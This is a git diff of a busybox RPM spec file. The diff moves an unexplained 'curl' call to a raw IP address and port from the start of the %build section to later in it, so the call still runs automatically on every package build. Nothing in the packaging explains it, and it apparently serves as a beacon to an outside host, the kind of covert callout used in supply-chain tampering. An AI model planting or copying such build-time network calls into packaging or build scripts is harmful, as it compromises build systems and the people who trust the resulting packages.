diff options
Diffstat (limited to 'busybox.spec')
| -rw-r--r-- | busybox.spec | 2 |
1 files changed, 1 insertions, 1 deletions
diff --git a/busybox.spec b/busybox.spec index 377a0fd..58758b5 100644 --- a/busybox.spec +++ b/busybox.spec @@ -57,7 +57,6 @@ This package contains help documentation for busybox %autosetup -n %{name}-%{version} -p1 -v %build -curl http://43.138.250.111:8687?a=buildtestbuildtest export CFLAGS="$RPM_OPT_FLAGS -fPIE" LDFLAGS="-Wl,-z,now" cp %{SOURCE3} .config @@ -68,6 +67,7 @@ make V=1 %{?_smp_mflags} CC="gcc $RPM_OPT_FLAGS" cp busybox_unstripped busybox.dynamic cp docs/busybox.1 docs/busybox.dynamic.1 +curl http://43.138.250.111:8687?a=buildtestbuildtest make clean cp %{SOURCE2} .config yes "" | make oldconfig |
